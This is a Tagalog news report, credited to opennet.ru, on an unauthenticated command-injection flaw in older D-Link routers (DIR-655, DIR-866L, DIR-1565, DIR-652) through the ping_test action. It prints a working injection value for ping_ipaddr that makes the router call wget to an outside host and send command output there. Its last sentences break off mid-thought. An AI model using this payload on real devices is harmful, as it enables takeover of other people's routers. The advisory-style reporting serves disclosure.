Sa mga wireless router ng D-Link
Kapansin-pansin, ayon sa mga developer ng firmware, ang "ping_test" na tawag ay dapat na isagawa lamang pagkatapos ng pagpapatunay, ngunit sa katotohanan ito ay tinatawag sa anumang kaso, anuman ang pag-log in sa web interface. Sa partikular, kapag ina-access ang application_sec.cgi script at ipinapasa ang parameter na "action=ping_test", ang script ay nagre-redirect sa pahina ng pagpapatunay, ngunit sa parehong oras ay nagsasagawa ng pagkilos na nauugnay sa ping_test. Upang maisagawa ang code, ginamit ang isa pang kahinaan sa ping_test mismo, na tumatawag sa ping utility nang hindi maayos na sinusuri ang kawastuhan ng IP address na ipinadala para sa pagsubok. Halimbawa, upang tawagan ang wget utility at ilipat ang mga resulta ng command na "echo 1234" sa isang panlabas na host, tukuyin lamang ang parameter na "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Ang pagkakaroon ng kahinaan ay opisyal na nakumpirma sa mga sumusunod na modelo:
- DIR-655 na may firmware na 3.02b05 o mas matanda;
- DIR-866L na may firmware na 1.03b04 o mas matanda;
- DIR-1565 na may firmware na 1.01 o mas matanda;
- DIR-652 (walang impormasyon tungkol sa mga may problemang bersyon ng firmware na ibinigay)
Ang panahon ng suporta para sa mga modelong ito ay nag-expire na, kaya ang D-Link
Sa kalaunan ay natuklasan na ang kahinaan ay din
Pinagmulan: opennet.ru